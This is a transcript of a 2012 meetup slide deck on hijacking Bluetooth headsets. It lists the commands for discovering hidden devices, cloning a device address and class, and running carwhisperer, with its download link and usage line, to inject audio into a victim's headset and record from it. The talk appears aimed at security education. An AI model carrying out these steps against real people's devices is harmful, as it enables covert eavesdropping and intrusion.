Hijacking bluetooth headsets

38
By Swaroop YermalkaR

description

null Pune Chapter - November 2012 Meet

Transcript of Hijacking bluetooth headsets

Page 1: Hijacking bluetooth headsets

By

Swaroop YermalkaR

Page 2: Hijacking bluetooth headsets

1. Finding Visible & Invisible

Bluetooth Devices along with their

specifications

2. Cloning Bluetooth Devices

3. Remotely Inject audio in

Bluetooth headsets and record

audio from it.

Page 3: Hijacking bluetooth headsets

BT5 r3 laptop Galaxy

pop

Nokia Bluetooth Headset

Bluetooth Dongle

Page 4: Hijacking bluetooth headsets
Page 5: Hijacking bluetooth headsets

79 channels 2.4-GHz ISM band

Devices hop across these channels at a rate of 1600 times per second

Bluetooth Device Address (BD_ADDR)

Page 6: Hijacking bluetooth headsets

Source: www.techtree.com

Page 7: Hijacking bluetooth headsets

Initial Setup

Page 8: Hijacking bluetooth headsets

1. Everything is in visible

Android Settings Ubuntu Settings

Page 9: Hijacking bluetooth headsets

#hcitool scan

#hcitool inq

Find a target First

Page 10: Hijacking bluetooth headsets
Page 11: Hijacking bluetooth headsets

btscanner

Page 12: Hijacking bluetooth headsets

Bluemaho

Page 13: Hijacking bluetooth headsets

2. Let’s Find the Invisible Devices…

Source: http://hwaddress.com/

Page 14: Hijacking bluetooth headsets

Let’s Find the Invisible Devices…

Page 15: Hijacking bluetooth headsets

Android Settings

Page 16: Hijacking bluetooth headsets

Start sniffing

Sniff on

mon0

Page 17: Hijacking bluetooth headsets

SAMSUNG

Page 18: Hijacking bluetooth headsets

It is Samsung device

Page 19: Hijacking bluetooth headsets

We have: 00:07:AB:ff:CF:88

~MAC address minus one

~ MAC address minus 1

~MAC address plus one

FOUND!!!

Page 20: Hijacking bluetooth headsets

#hcitool inq <bd_addr>

Page 21: Hijacking bluetooth headsets

Enumerate the services for further attack

Page 22: Hijacking bluetooth headsets

Recall Previous

Information…

Page 23: Hijacking bluetooth headsets
Page 24: Hijacking bluetooth headsets

#bdaddr -i hci1 <new_bd_addr>

#hcitool scan

Page 25: Hijacking bluetooth headsets

#hciconfig hci1 name “android”

#hciconfig hci0 class 0x58020c

Page 26: Hijacking bluetooth headsets

Observe the Fields

Page 27: Hijacking bluetooth headsets

Laptop

Page 28: Hijacking bluetooth headsets

Why to Clone the bluetooth device?

In certain premises, some bluetooth type device may be

restricted. Does it still bother you?

For many attacks such as attacks on bluetooth headset it is

necessary to make our device headset compatible.

Page 29: Hijacking bluetooth headsets

Is our bluetooth

dongle headset

compatible?

No? change its

class.

Page 30: Hijacking bluetooth headsets

Device conforms to the Headset Profile

Page 31: Hijacking bluetooth headsets

Find your victim

Page 32: Hijacking bluetooth headsets

Download url:

http://trifinite.org/Downloads/carwhispe

rer-0.2.tar.gz

Page 33: Hijacking bluetooth headsets

#./carwhisperer <interface> <injecting audio file> <Output

file> <victim BD_ADDR>

Page 34: Hijacking bluetooth headsets

Built on AIRcable XR™ long-range

technology

1 km external antenna included

Extended range for up to 30 km***

No external power needed

Aluminum case for reduced interference

and increased sensitivity

Page 35: Hijacking bluetooth headsets

Yi-Bing Lin

1. Bluetooth Hacking: The state of art by

trifinite.org

2. Bluetooth Wiki

Page 36: Hijacking bluetooth headsets
Page 37: Hijacking bluetooth headsets

www.chmag.in

Nov-2012Sep-2012Oct-2012

Page 38: Hijacking bluetooth headsets

Feedback, questions and suggestions:

[email protected]